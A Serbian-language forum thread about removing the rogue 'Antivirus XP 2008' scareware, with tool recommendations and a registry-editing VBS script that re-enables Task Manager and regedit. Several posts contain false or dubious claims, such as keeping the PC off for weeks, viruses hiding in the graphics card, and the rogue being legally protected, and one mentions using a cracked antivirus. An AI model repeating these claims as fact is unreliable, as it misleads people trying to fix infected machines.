Njega lako otklanja malwarebytes i tu nema mnogo nauke.
Problem je sto XP antivirus2008 dolazi sa nekim zlob ili vundo trojanom ... pa to treba proveriti
SpyBoot SD ce okloniti svaku sumnju sta se jos nalazi pored pomenutog XP antivirus 2008

Sve informacije dobro dođu, na sve strane vidim da se žale na njega.

drug mi imao taj "AV" ,kupio pc dobio uz njega legalan win XP Home i koristio ga nakon nedelju dana pokupio je taj "AV" mucio se 2-3 nedelje da ga skine,brisao je win svaki dan,formatioraco C: particiju uvek ,skenirao ceo pc ,formatirao zatim ceo hdd i uvek mu se vracao taj virus...
trazili smo po netu kako se ukljanja al nigde ne pise kako on dodje(udje) ,a drug ga nije skidao ....dal neko zna kako ulazi?
nesto sam procitao da napada samo Home Editio ..a drug ga se resi tako sto je presao na pro...

Zaraza obicno pocinje online.Odjednom vam iskace prozor sa reklamom za doticni AV i ide onaj progres bar,satro kao nesto skenira.Onda napise da je nasao "tri hiljade i nesto" virusa i nudi vam download tog programa.Ako vam se desi ovako nesto,odmah zatvorite pretrazivac da bi nestao i taj prozor ;-) Nije tacno da napada samo Home Edition jer ja imam XP Pro pa mi se "nudio"...

Koliko ja znam, a kao sto je @gti 2 vec napisao, siri se online i nema veze da li je Windows Pro ili Home (mogu potvrditi da sam naisao na nekoliko slucajeva gdje je bio na Pro verziji). Tvoj kolega ili stalno posjecuje neki site koji ga automatski skida i instalira ili je naisao na neku prepravku koja je ubacila autorun na drugu particiju pa ga pokrene/instalira cim nju (particiju) otvori. Inace ovo drugo je cest problem koji se desava ljudima u zadnje vrijeme - sve vise je virusa koji prave autorun sebe samog u root-u praticija, ljudi formatiraju disk u nadi da ce ga ocistiti i zaraze se pri prvom otvaranju sekundarne particije.
Zato je potrebno odmah nakon nove instalacije sistema otvoriti My Computer, namjestiti da se vide skriveni i sistemski fajlovi i onda otvoriti sve particije, ali klikajuci na nju u tree, a ne dvoklikom i pobrisati sve sumnjive fajlove i pogotovo autorun.inf. (inace ko zna raditi u CMD-u moze zna kako ovo mnogo brze uraditi).

na dosta racunara sam se susreo sa ovim problemom, uspem da ga uklonim kao iz ovog tutoriala, ali posle 10tak minuta se pocinju javljati plavi ekrani BSOD, sa razlicitim porukama, nikad nije ista poruka.

Znaci dok ga ne uklonim BSOD-a nema nikako, kako ga maknem, tako imam BSOD svakih 2 minuta.

ja sam ga se na visti rijesio sa FixIEDef.exe i Malwarebytes i to relativno lako ! :)

I meni se "nakačio" pre desetak dana. Tada sam imao Norton antivirus. Pronađe ga i kao obriše. Međutim i dalje plavi ekran itd... Deinstaliram Norton, skeniram kompjuter sa "Spybot"-om i ubacim Bit Defender 2009 (probnu verziju od mesec dana) skeniram-pronađe ga. Restartujem komp i nestao !!! Naravno ostaje Bit Defender do daljnjeg! Nisam imao potrebe da reinstaliram Win. Eto mog iskustva.Pozdrav.

I ja sam ga zakacio slucajno verovatno... poludeo.Malwarebytes otklanja lagano,ostavi neke dll zaostale pa javlja greske pri podizanju sistema ali oni se lako brisu rucno.

Malwarebytes antimalware je nabolji,dva puta sam imala isti problem sa tim nazovi AV programom,otklonio ga je vrlo brzo i posle nisam imala nikakvih problema(nikakve pruke a kamoli BSOD).Još uvek ga imam instaliranog iako imam Avast! AV(koji nikako nije mogao da ukloni trojanca koji je došao uz AV XP 2008).Držim ga čisto za svaki slučaj :)))

Napada i Linux.
[att_img]

Na web stranici http://www.bleepingcomputer.com/
ima besplatan alat koji se zove Combofix
downolujte isti.
Meni je pošlo za rukom na više računara
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Takodje, pise i sledece:



Ukratko, nemojte koristiti ovu alatku ukoliko niste sigurni da znate sta radite

SD resava problem, eventualno iz dva puta (skenira, ocisti i kaze da nije sve uspeo, pa trazi restart i onda pre restarta odskenira i ubije ga definitivno).

@mcanji Avast??? To ne moze ni sebe da zaustavi a kamoli neki virus. menjaj to sto pre. Ako nisi u situaciji da platis licencu za AV program (ili ti podaci sa kompa nisu bitni) skidaj i instaliraj free mesecne varijante, izbegavaj te besplatne, nisu sigurne.

Pozz

Combofix menja postavke racunara, tako da ko ne zna kako se radi sa tom skriptom nemoj da je koristi.

u pravu si ... xp2008 nije virus, ali virus jeste malware.

Malware je zajednici imenitelj za sve vrste malicioznog softvera (malicious software) i tu spadaju virusi, crvi, trojanci ... spyware ... rootkit ;)

ESET NOD32 - 47 successes and 3 failures (94% success)
Kaspersky - 40 successes and 15 failures (73% success)
.
.
.
.
.
Avast! - 24 successes and 20 failures (55% success)

Proveri kompjuter sa nekim drugim antivirus softverom, mozda se iznenadis.

a Sophos?
proveravan je i sve je ok... ali eto iskustvo mi kaze da bezim od kaspersky....
nod 32 nisam probao...
mada i sve te liste su reklame :)
Ovo govorim samo iz licnog iskustva i racunara koje sam cistio...avast ima dobru opciju da skenira ceo sistem ali pre nego se podigne sistem a ima i opcija da napravis bootabilni CD sa AV i lepo cistis racunare redom ...
Ovo su samo moja zapazanja ne ulazim u raspravu ko je bolji..

Ne spamam nego meni je pomogao ovaj program http://www.malwarebytes.org/mbam.php u free verziji rjesio mi je puno muka... skini ga izvrsi update... skeniraj kada zavrsi skeniranje odes na show result i skidas sto je nasao..:)

Sa srecom

To što "napada" linux ne znači apsolutno ništa. Koliko vidim nudi da se skine exe fajl, a on će kao uspeti da napravi neku štetu na linuxu...Ajde da je neka shell skripta pa da se zabrinem, ali ovako najviše štete može samo da napravi unutar .wine dira.

Inače ekipa, koja je napravila ovo smetalo, se dosta oslanja na java scriptu da bi navukli lakoverne kako se njihova mašina skenira, a u stvarnosti vuče se jedna te ista flaš animacija. Za ovakve napasti najbolje rešenje je NoScript ekstenzija za FireFox (blokada svih skripti i flash animacija dok se to eksplicitno ne dozvoli, zaštita od XSS-a), potom Controle de Scripte (bolja kontrola nad java scriptom) i naravno AdBlock Plus, za blokiranje reklama pošto se one mahom koriste kao navlaka.

Taj BSOD koji dobijas je, ustvari, "fake" iliti naski "laznjak"... stisni dva puta Esc i on ce nestati! Ako obratis paznju sta ti napise da ti "nedostaje", onda ces shvatiti... To isto SpyBoot skida. Ne zaboravi pokrenuti i HijackThis program i iskljuciti sve nepotrebno (naravno, ako znas.. )

i vi ste uspeli ovako da ocistite komp ??

iskljucili dva fjla da se ne startuju prilikom podizanja Windosa i to je to?

ja sam zapatio na jednom racunaru slican (nije isti kao na screenshootu sa prvog linka) virus i to je prva stvar koju sam pokusao:

prvo ubijem proces iz taskmanagera pa ga zatim izbacim iz StartUp-a.

ali posle dve reboota Windowsa ponovo se pojavi!

onda sam gotovo sve sto sam mogao poiskljucivao i opet se pojavi :( kao da je zarazio npr. explorer.exe ili neki drugi "vitalni" deo windowsa... :/

kako bilo, morao sam da formatiram C:

e napada linux :P to je bas dobra fora,kada nekom normalnom ko koristi linux izbaci onaj spisak virusa,bas se zabrine i pokusava da ga instalira,smesno.
avast je odlican antivirus,ali kome to jos treba,dovoljno je imati firewall u ruteru ili instaliran na kompu,neki malo bolji task menager od windowsa i na primer autoruns.exe ako dodje do nekog propusta,a podrazumeva se da pri tome korisnik zna da koristi racunar,jer ako ne zna nece mu pomoci ni hiljade antivirusa i antispaywera ni ne znam cega.
evo ja sam bas cistio bratov racunar koji je imao ova antivirus xp 2008 + cca 1500 drugih virusa i uspeo sam da ocistim od svega i sad radi(sto i mene cudi) sasvim ok,naravno stavio sam mu avast i dobar firewall,na moju zalost on ne zna da koristi racunar,pa cu ja imati posla ponovo kroz neki period.najbolje od svega sto njegov racunar kada sam ga preuzeo na ciscenje nije mogao nista da radi,znaci podizanje windowsa min 5 min,ali nije bilo sanse nista pokrenuti kada se podigne windows,task menager je bio zabranjen,iz komande run takodje nista nije moglo da se pokrene,a kada sam pokusao da pokrenem instalaciju bilo cega,sa dvoklikom bi mi pokazao opciju open with,pa cak i kada sam pokusavao exe programe koji su vec bili instalirani da pokrenem.kada sam uspeo da pokrenem autoruns.exe nije mi bilo dozvoljeno nista da ugasim. ipak sam uspeo da instaliram avast i da pokrenem boot scan i posle sam antivirus xp 2008 ubio malwarebyte-om i sredio os da sam se i sam cudio kako je bilo moguce posle svega da radi ispravno.

Poz svima. Vidim da ste i vi imali problem sa ovim sra.... Mene je nekoliko puta zakacio i formatirao sam disk jer do tada nisam koristio nijedan anti-virus.

Pokusavao sam da instaliram NOD 32 (neke starije verzije) ali nikako nisam uspeo da update-ujem bazu jer nisam uspevao da ga crackujem kako treba.

Tek kada sam nasao verziju 3.0.642.0, koja je imala dobar fix NOD je proradio i to odlicno. Vec nekoliko puta me je obavestavao na viruse "Antivirus XP 2008 / XP Protector 2009" i isti mi nisu naneli nikakvu stetu.


E sad moje resenje za ovakav problem. Naime, kada sam formatirao disk prvi put i instalirao sve sto mi treba nije proslo ni nedelju dana opet mi je upao doticni virus ali me je mrzelo da formatiram particiju i da idem sve ispocetka pa sam probao da vratim system preko System Restore-a i to mi je upalilo na svu srecu. Naravno imao sam srece da nisam iskljucio System restore (sto inace redovno radim kada instaliram system).

Samo da napomenem da koristim Win XP Pro SP2.

E ljudi, ne znam gde da napisem ovaj post ali u zurbi sam pa ga ovde pisem... Potrebna mi pomoc i ako moze neko da mi odgovori na email [email protected].. Problem je da imam neki virus a ne znam koji jer ne moze antivirus da ga skenira... Eo kako radi. Ukljucim comp, radi normalno i posle nekog vremena,ako npr slusam muziku, krene da se ponavlja kao pokvarena ploca (i to brzo) i posle 10ak sekundi normalno i onda opet tako... Ako znate sta je molim vas da mi odgovorite na email! hvala unapred!

Imao sam isti problem samo sam preso na drugu particiju i sve normalno funkcijonise.

Ovo je za [es] bisere definitivno... :P

Back on topic: Jel' iko ko se "zarazio" probao da ga ukloni sa HijackThis?

@n1tr0
Ja sam uspela bez problema da uklonim AntiVirus 2008 uz pomoc HijackThis. Vise nikakvih problema nisam imala

xp antivirus je obican rogue program
za uklanjanje istog koristite
RogueRemover
http://www.malwarebytes.org/rogueremover.php

posle toga sceniranjem sa Malwarebytes
http://www.malwarebytes.org/mbam.php

naravno...uz ovo pozeljno skeniranje i sa AV i AS programima
preporucujem KIS + Spybot S&D

a ako nista nepomogne...tu je HijackThis i ostali alati..
mada ovo gore bi trebalo da ga "ubije"

Taj antivirus xp 2008, je malware i Avast narvno da ga propuštao.
ako hoćeš siguran rad obavezno je:
- redovan i pouzdan backup važnih podataka, a ako se radi o poslovnom okruženju onda se može dobro razmisliti i o backup-u softwera i sistemskih komponenti
- redovni Update operativnog sistema pogotovo Windowsa
- obavezan antivirus program
- obavezan antispyware/antimalware
- obawezan firewall
- dobro podešeni klijent za poštu i browser
- redovno praćenje log fajlova i brisanje tmp fajlova pogotovu iz browsera.
- naravno verovatno se može o još ponečemu reći detaljnije ali je ovo dovoljno.

Ukoliko išta od ovoga propustiš, naravno da ćeš imati problema, ali nije uvek samo rešenje u preinstalaciji sistema, ako se pouzdano zna da ni obično formatiranje diska u potpunosti ne rešava uvek probleme.

ako hoces siguran rad obavezno je pre svega:
-nauciti nesto o racunarima
-nauciti nesto o malicoznim programima(sta su, kako rade,zastiti od njih)
-nauciti nesto osnovno o operativnim sistemima
-nauciti nesto o firewall-ovima i podesavanju istih
-disciplinovati se u koriscenju racunara

u protivnom dzaba je sve ostalo jer ako ne znas sta radis sigurno ces pogresiti(Marfi ce se pobrinuti za to) :)

Reinstalirao sam Windows XP Home, tek što sam to uradio, zapatio sam ovaj Antivirus...i pored Avasta...šta raditi?
probaću da ga ubijem, ali mi se ne čini da će proći sve sem formatiranja, a pitanje je da li će i to

Pratio sam uputstvo, otišao u startup i tamo ga isključio, zatim ga samo uklonio iz program filesa, a nakon toga iskenirao sistem sa malwarebytom, i nema ga više. Da li ga stvarno nema ili se prikrio, videćemo, uglavnom malware je ubio masu njih, oko 32 trojanca. Nisam mogao da nađem one fajlove u system32, kako piše u uputstvu, nego ih je uništio malware...Trebalo bi da je sve ok, ispalo je lakše nego što sam očekivao. Sad sam stavio i firewall.

otvorio si neki sexy sajt, i tako si ga navukao, ima na netu klip kako se zarazava sa tim "antivirusom"., malware ga unistava od shale

AGENT SMIT

Pokusaj sa System Restore. Meni je upalilo.

Ima 3 nacina: Avast, Trojan remover ili Spybot, svi oni skeniraju komp pre nego so se windows krene.

a sto komplikujete bezveze??
to je rogue program...
ubija ga MBAM i MBRR
ako ostanu neki ostatci,moze da se resi HjT i ostalim alatima






mada..moze da se desi da taj antivir 2009 nedozvoli skidanje MBAM-a...
kao ni jednog drugog programa...zato..deco..koristite zastitu

Prva zastita je GLEDAJTE gde klikcete a ne sammo yes yes yes yes yes yes yes jer ako tako nastavite nikad necete resiti taj problem uvek ce se vracati vas voljeni XP Antivirus koji u paketu nosi i zlob trojanca i jos neke sitnije zezalice jer naravno treba nesto i da ocisti :D.Zbog cega formatirate hard kad moze da se pokrece iz bilo koje druge memorije npr ram. Prvo ocistite komp pa tek onda preintalirajte os jer nije neko resenje odmah formatiranje neki virusi moze veoma lako da se zadrze i u ramu ili eventualno u grafickoj. Ja licno vec duze vremena apsolutno imam cist komp ( na kompu koji ima window) ali ne zbog nekog av vec jednostavno se drzim pravila koje sam na pocetku napisao

Vrlo ne mora da znaci. IE7 je previse osetljiv na njega, pogotovo kada se iskljuci Phishing filter. Meni se pojavio 'kao spasonosni faktor' kada sam hteo da napravim msn nalog.

Još korisnih uputstava:
How To Safely Remove BestSeller Antivirus

Ako vam se dešavaju situacije kao na sličicama...

Desava se da recimo ne moze da se skine ni jedan antimalware alat sa neta, niti AV, jednostavno ovaj virus to ne dozvoljava kao sto je napomenuo magna86
U tom slucaju treba proveriti odnosno obrisati sve iz Hosts fajla, kako?
Preko notepada otvoriti hosts file C\Windows\System32\Drivers\etc\hosts i izbrisati sve ispod "127.0.0.1 localhost"

A zar niko nije cuo ili procitao da za odredjene viruse mora proci 15-21 dan da se potpuno ociste... tj. da bude komp iskljucen taj period kako bi se zasigruno unistili

E, ni meni nije jasno kako ljudi uspevaju da navuku ovaj virus... Lepo je neko napisao da ne treba samo na yes yes yes yes yes yes yes yes yes ... finish... nego treba nesto i da se cita.

I ja sam se jednom namucio da skinem ovaj antivirus, ali ne znam dal' ce da mi verujete, uspeo sam samo sa KAV-om i rucnim potezima u startup-u i registirma.
E posle toga sam na ostalim racunarima koristio, pored KAV-a, Malwarebyte's i HijackThis i uspesno resavao.

Nisam citao sta ste sve pisali, ali pretpostavljam da je neko vec izmislio "OnClick" ciscenje ovog virusa, ali ja nisam bas siguran na takvu vrstu ciscenja.

Pozdrav.

Posto radim sa netom stalno imam srece (citaj nesrece) da se susrecem sa svim mogucim i nemogucim virusima i gamadima sa neta.
Kad vas napadne neki od njih najbolji je recept.FORMAT i to onaj puni bez zastite podataka to ce rijesiti sve probleme,ali problemi nastaju kad radite format uz zastitu podataka jer doticni virusi ostanu negdje u tim podacima i opet jovo nanovo.
Sto se tice ovog tipa virusa (antivirus XP 2008 iliti 2009)Evo kako ja uobicajno ubijam tu gamad.Prvo Obirisem sve tempove na racunaru ako neki nece da se obrisu koristim mali ali jako vrijedan programcic "unlocker" uz njega jos koristim process explorer pa pratim sta se sve otvara i koristi mem od racunara.Zatim obrisem sve cookies.Jos nesto morate u folder postavkama ukuljuciti da vidite skrivene fajlove,ako vam je virus blokirao da vidite skrivene fajlove.Preko alatke search nadjite foldere TEMP i Temp internet files.Nakon toga pokrecem spyboot search&destroy nakon njega na posao stupa nod32 antivirus.Ipak desavalo mi se da ni tad ne uspijem do kraja ubiti taj virus posto nakon 2 ili tri dana opet pocne da izbacuje upozorenja.Uspijevam negdje oko 70% ostalo rjesavam formatom s tim sto ako trabam zastiti podatke kod korisnika kacim njegov hard na drugi komp koji ima svu mogucu zastitu kaspersky puna verzija ili AVG internet security full pa preskeniram prije rada formata.Eh da zavrsim onaj combo fix je jako dobar kad vam virusi ostave iza sebe autorun komande pocesto sam ga pokretao nikad mi nije pravio probleme znaci ok je

@ernie mikrotik probaj Malwarebytes' Anti-Malware, odlicno se nadopunjuje sa Spyboot search&destroy, kao sto bih preporucio kada vec cistis racunar da NOD 32 upotpunis sa Kaspersky AV naravno ne da ih instaliras u isto vreme na racunar. Sto bi rekao jedan moj drugar: "Ukoliko koristite neki od besplatnih AV resenja kao sto su Avira ili AVG a pritom predjasni pokusaji nisu dali rezultata, slobodno deinstaliraje AV i skinite Nod32 ili Kaspersky u probnoj ali u 100% funkcionalnoj varijanti kako bi ste iskenirali racunar.
Nakon uspesnog uklanjanja zlonamernog softvera, pomenute probne verzije mozete deinstalirati i vratiti svoj stari besplatni antivirus."

ne moze sam NOD ukloniti...navedeni AV
ja pak koristim set programa:
1.CCleaner
2.Smitfraud Fix
3.ComboFix
4.Ad-aware
5.SpyBot SD
6.Spyware Blaster
7.Google Toolbar
ovim redom se instaliraju alati...
kada se instaliraju pokrenem update za program br. 4 i 5
raskacite komp sa neta... i pokrecem redom programe...
Google Toolbar je eto kao da sprijeci ove pop up al eto ko ga ne voli nek stavi neki drugi:)
kad sam zavrsio ciscenje sa ovim programima ubacim ESET Smart Security pokrenem ciscenje sa Esetom i racunar nema vise Antivirus XP 2008 i ostale gamadi...:)
Provjereno, ocistio sam barem 50ak racunara ovom metodom... sa srecom i pozz ;)


_{[Ovu poruku je menjao Goran Mijailovic dana 09.11.2008. u 02:30 GMT+1]}

Po meni je opet najbolja fora sa System Restore.

Kod mene je upalilo i nemam problema. Mnogo je brze od formata a ne morate da se zezate po netu i trazite pomocne programcice.

sistem restore ne moze da ukloni virus ni kao ni rogue..

Ok. Mozda ne moze ali zasto mi onda comp radi kao da se nista nije dogodilo?

Cak nemam ni dodatnih procesa.

Verovatno ti se pritajio..

@Deyan_80 skini Malwarebytes pa proveri system.

Hvala Kristi. Nasao je bas ono sto je trazio mada meni posle restora nije smetao.

U listi koju mi je malwarebytes izbacio nijedan exe mi nije bio u procesima sto znaci da iako je "sra..." prisutno nista ne radi tako da i nema neke koristi od njegovog uklanjanja ali nije zgoreg ukloniti ga.

Jedino sigurno resenje je formatiranje particije.I sam sam to uradio juce.Nema mu spasa,i pored ESSET Smart Security i Sygate Firewalla je prosao.

jeste najbolje ubaciti svjez windows ali ako nekome nije do reinstalacije onda je najbolje poubacivati programe i ocistit komp...

Ovaj tzv antivirus sam uklonio ni sam ne znam kako i posle koliko skeniranja diska. Sada imam drugi problem, blokirao mi je automatic update. Pokupio sam izgleda trojanca koji je to uradio i nikako ne mogu da ga aktiviram. U control panelu>sistem>auto update je čekiran automatic update on, ali ne radi. Ne mogu da updatujem ni windows ni antivirus NOD 32. Da nesreća bude veća reinstalirao sam NOD pa sada ne mogu da update ni jednu noviju datebase, što će reći da praktično i nemam antivirus zaštitu.

Pomagajte.

Izgleda da je konacno i Microsoft resio da se malo umesa u vezi ovog problema:

Microsoft cleans fake antivirus tool from 994,061 PCs

I meni se desilo da prilikom reinstalacije, nakon toga je izgleda uleteo neki trojanac, koji nije dozvoljavao automatic update..ali je to bilo neposredno pre nego mi je crkla matična ploča...sad sam ubacio drugu koju su mi zamenili jer je ova bila pod garancijom..uglavnom pre toga su mi se dešavale te čudne stvari.
Sve je krenulo od onoga "NTDLR is missing", jedno jutro mi je samo to prijavio, naravno posle toga je pala reinstalacija, da bi zatim zapatio ovaj fake ANtivirus i sve uz njega...Na kraju mi je crkla motherboard...
Sad ćutim i uživam, maksimalno zaštićen..

Problem ovog virusa je sto on i nije virus po americkom zakonu. Neko rece ranije - nemojte samo kucati na "YES" i posle se cuditi. Po njihovom zakonu nesto je nedozvoljen program (malware, virus...) samo ako se instalira BEZ Vaseg znanja. Vi ste kliknuli na "YES" kad Vas je on upitao zelite li da se instalira. Samim tim ste pristali na sve njegov posledice. Zato veliki AV programi i MORAJU da ga propuste. On je legitiman!!! Zbog toga neka od ovih resenja rade neko vreme pa prestanu. Ako niste primetili, njega se mozete resiti i ako ga platite. Onda ga registrujete i tek tada dozvoljava deinstall. Ali 50$..... To samo znaci da oni, zbog gomile naivcina, imaju puno love i mogu da tuze svakoga ko ih smatra virusom i kao takve uklanja - budite sigurni da to i rade i da ce ovakvih programa da bude sve vise.

_{[Ovu poruku je menjao backup dana 10.12.2008. u 19:15 GMT+1]}

Upravo je tako kako je Backup rekao nisam do sada imamo ni jedan firewall, antispyware itd sem AVAST-a i to free a pogledajte ovo:

Malwarebytes' Anti-Malware 1.31
Verzija baze podataka: 1501
Windows 5.1.2600 Service Pack 2, v.2149

15.12.2008 19:40:09
mbam-log-2008-12-15 (19-40-09).txt

Tip skeniranja: Brzo Skeniranje
Skeniranih objekata: 48860
Proteklo vreme: 3 minute(s), 9 second(s)

Inficirani procesi u memoriji: 0
Inficirani moduli u memoriji: 0
Inficirani kljuèevi u registru: 0
Inficirane vrednosti u registru: 0
Inficirani podaci u registru: 0
Inficirane fascikle: 0
Inficirane datoteke: 0

Inficirani procesi u memoriji:
(Maliciozne stavke nisu detektovane)

Inficirani moduli u memoriji:
(Maliciozne stavke nisu detektovane)

Inficirani kljuèevi u registru:
(Maliciozne stavke nisu detektovane)

Inficirane vrednosti u registru:
(Maliciozne stavke nisu detektovane)

Inficirani podaci u registru:
(Maliciozne stavke nisu detektovane)

Inficirane fascikle:
(Maliciozne stavke nisu detektovane)

Inficirane datoteke:
(Maliciozne stavke nisu detektovane)
mislim da ovo dovoljno govori o avastu i o odgovornosti prilikom surfovanja
Pozdrav

Sto se tice antivirusa 2009 ne slazem se sa onima koji kazu da mora da se pritisne yes da bi se instalirao.
Cak i ako ga kanselises on pocinje da skenira,govoreci pri tom da je zarazen ceo komp i da sve treba brisati.Evo mene je ovih dana upravo napao.,ali mu uspesno odolevam.
u kasperskom sam chekirao enable file antivirus i web antivirus stavio ih na maximum,anti pishing i antidiler su mi takodje enabled,i za sada se dosadni skot ne pojavljuje. Taj skot se ne mora aktivirati sa "YES,YES,YES" dugmetom. Dovoljno je da ti neko postavi link "koji te vodi ka necemu sto ti trazis",a u stvarnosti te odvede do linka antivirus 2009,Mozes i da mu stisnes dugme NO,ili da ga kenselise Gospodin SKOT pocinje da skenira.Ako se to desi ,diskonnektuj se i restartuj sistem da zeznes skota,a zatim probaj da cekiras u kasperskom ona polja enable...... Eto mene skot za sada vise ne uznemirava.

Koliko sam ja mogao da primetim na ovom forumu se pojavljuju poruke tipa: 1."Kad to vidis restartuj...", 2."Falio mi je NTLDR..." i sa njim verovatno i Boot.ini kao i Ntdetect.com, 3."Najbolje je resenje da formatiras...", 4."Instaliraj... to to to to to i to pa i jos to...", 5."Probaj ovaj rootkit, probaj onaj ...".
JBT. ljudi ima li ovde nekoga ko nije laik za racunare sem dvojice (mislim) koji su Vam dali najpametnije savete do sad.

Jednostavno:
1.Nemas potrebe da restartujes racunar ako ti je iskocio neki takav smesan prozor. Zatvori page. Danas svi browser-i imaju tabed fazon i lepo kliknes na X.

2.Falio ti je fajl ??? NTLDR ? Ajmo... to moras da formatiras pa ti se brise sve sto ti je bilo na desktop-u npr. pa ti brise sve lepo instalirane programe i podesene, pa iz My Documents takodje se sve brise jer kod 99,99% korisnika MyDoc's stoji na "c:\Docume~1\korisnik\My Documents" i tu skladiste svoje podatke. GLUPOST!!! Jesi li cuo za Hiren'sBootCD ? Ili za XP Setup CD ? Ili jednostavno neki (bilo koji) linux. BILO STA STO MOZE DA SE BOOTA I STO MOZE DA TI "GLEDA" U DRAJVOVE MOZE DA TI RESI PROBLEM ZA DESET MINUTA. U to budi uveren.

3.FORMATIRANJE NIJE NAJBOLjE RESENJE. (Osim u slucajevima gde je to neophodno, u ovom slucaju SIGURNO nije) Par poteza ili tacnije par desetina poteza i racunar ti je nov. Treba samo upregnuti vijugu.

4.Instaliranje svih tih cudesa dodatno usporava racunar. Zasto? Evo... Svaki od tih antivirusa itd. programa ima svoj "kernel" koji se ucitava pri boot-u i ima svoj "ControlCenter" koji se startuje pri login-u usera. Svaki od njih zauzima po "neki" procenat procesora ram-a, ovoga, onoga... i takvo usporenje se da primetiti. Naravno sad ce mnogi reci: "Meni komp radi isto...", "Ja imam core2qad :) bla bla truc..." i jos neke budalastine, ali oni ne znaju da postoji jos korisnika sa dosta slabijim konfiguracijama a kod takvih se bogami oseti. Naravno ovi isti, pretpostavljam laici ce reci: "Pa zasto ne kupe bolji...". Glupost. Da ne skrecem sa teme.

5.Kazu: "Proba se ne placa" ali se zato nekad i opeces. Licno meni rootkit RootkitRevealer napravio problem, dok sam npr. njega koristio na bezbroj mesta i odradjivao posao. Nemam nista protiv rootkita. Korisne su to alatke. Samo treba obratit paznju sta koristiti i ODAKLE GA SKIDATE.


1. Sto se tice prvog. Mozes da iskljucis page na x i nemas brige sve dok je neko ne nadje u history. Dakle posle toga obrisi history.

2. Spomenuo sam "BILO STA STO MOZE DA BOOTA...". Da. Kako povratiti ntldr?
a. Hiren'sBootCD.
Startuj dos iz njega i prebaci fajl na c:\. Mozes ga naci u "C:\WINDOWS\ServicePackFiles\i386" ako imate instaliran service pack, ili ga prekopirati sa necijeg racunara, dakle fles. Fles mora biti na usb portu pri bootu cd-a.
b. XP Setup CD.
Ubacite setup disk i kad vas lepo pita da li zelite da instalirate svezu kopiju win-a ili da ukljucite recovery konzolu vi odaberite drugo. Dakle pritisnete R i otvara Vam se RecoveryConsole, vidi se kao DOS... ajd. Pitace Vas u koji Win zelite da se ulogujete. Verovatno ce biti samo jedan tako da pritisnete 1 i enter. Unesite password ako je potreban, ako ne samo Enter i pocnite sa vracanjem podataka.
Pretpostavljam da cete do tad nauciti osnovne komande u dos-u.
fajl NTLDR se nalazi u "CD-Rom:\I386" gde je CD-Rom "Slovo" koje ga predstavlja. Uzecemo da je to "E:\".
Kucamo sledece: copy "E:\I386\ntldr" "C:\ntldr" Ista stvar i za ntdetect.com jer i njega virusi brisu u paketu sa ntldr.
c. Bilo koji Linux. Verujte mi, ovo je igra za malu decu. Ovde cak i ne moras da kucas copy... vec sve radis desni klik pa copy kao i u Win-u. Ovo ne zelim da Vam objasnjavam. Bilo bi jako nisko. A zeljene fajlove cete naci na vec pomenutim lokacijama.

3. Ako ne mozes otvoriti regedit to je razlog sledeceg (ovo vazi i za task manager):
a. Virus je sebe postavio za regedit-ov debugger.
b. Virus je zabranio pristup regedit-u.
c. Virus je obrisao regedit. Moze se vratiti iz foldera "C:\WINDOWS\ServicePackFiles\i386", "%systemroot%\system32\dllcache" ili sa setupCD u folderu "..\I386\regedit.exe" kao i sa flesa. Postoji milion kombinacija za to.
Sledeca VBS skripta Vam moze MNOOGOOO pomoci.

''''''''''''''''''''''''''''''''''''''''''''''''
On Error Resume Next
Set Skripta = WScript.CreateObject("WScript.Shell")

'Brisanje zabrane za task manager iz Policies:
Skripta.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"

'Brisanje zabrane za regedit iz policies:
Skripta.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"

'Brisanje debuggera za oba:
Skripta.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger"

'Pokrece TaskMgr i Regedit
Skripta.run "taskmgr.exe"
Skripta.run "regedit.exe"
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Otvorite Notepad i prekopirajte gornji text a zatim sacuvajte kao VBS. Kako? File, Save As, zatim u nazivu stavite "skripta.vbs" a dole u Save As Type neka bude "All Files", save. Posle starta vbs fajla pokrenuce Vam se i taskmanager i regedit

Kad Vam se startuje regedit mozete da pretrazujete po njemu. Sta? Sve veze koje postoje sa doticnim "Skotom". Kako?
Preporucujem da skinete ProcesExplorer jer Vam on omogucuje da vidite iz kog fajla se izvrsava nezeljeni proces kao i njegov ImageName koji cete koristiti u pretrazi kroz registre. Mozete ga skinuti sa www.sysinternals.com iliti http://www.microsoft.com/technet/sysinternals sto mu dodje isto. Prvi je redirektovan na drugi. :)
Dakle, u ProcesExplorer-u vidite sta Vam smeta i krenite u potragu. Najbolje da zapisete ImageName tih virusa pa da ih odmah iskljucite iz procesa i naravno obrisite fajl (Ime fajla se vidi po zadrzavanju misa iznad zeljenog procesa ili desni klik properties). Dalje, gde god da nadjete njegov ImageName (u registrima) brisite ga ali pre toga napravite backup tog kljuca u kome se nalaze i ostale informacije verovatno bitne za Vas racunar kako bi u slucaju neke greske mogli da vratite na svoje mesto.

ZNAM DA VAS SMARAM ALI ISPLATICE VAM SE !!!

Bitno je takodje da nadjete veze koje mogu biti oblika npr. {6e93bcf0-aa4a-11dc-b23d-001d60027d3c} pa pretraziti registre sa takvim oblikom i obrisati. Napraviti backup.
Ovo Vam moze posluziti kao zlatni tutorial za sve buduce ne daj boze viruse.

4. Necu da komentarisem. Savet je izmedju redova.
5. To je Vasa stvar. Rootkit pomaze ali u ovom slucaju nije potreban.

Molim sve Vas da obratite paznju na ovo. Ako ko opet ima problema neka se javi ovde ili neka salje mail na [email protected]. Vrlo rado cu pomoci. Jos jedna mogucnost:
TeamViewer je zlatan programcic za remote desktop. Ako ko zeli mogu i preko njega da ja sam otklonim problem.
Sto se placanja tice... :) :) Sala. Popij koje pivo za mene ili sta vec. Nadam se da Vas nisam udavio ovolikim textom a siguran sam da je od pomoci. Hvala! Pozdrav svima!!!

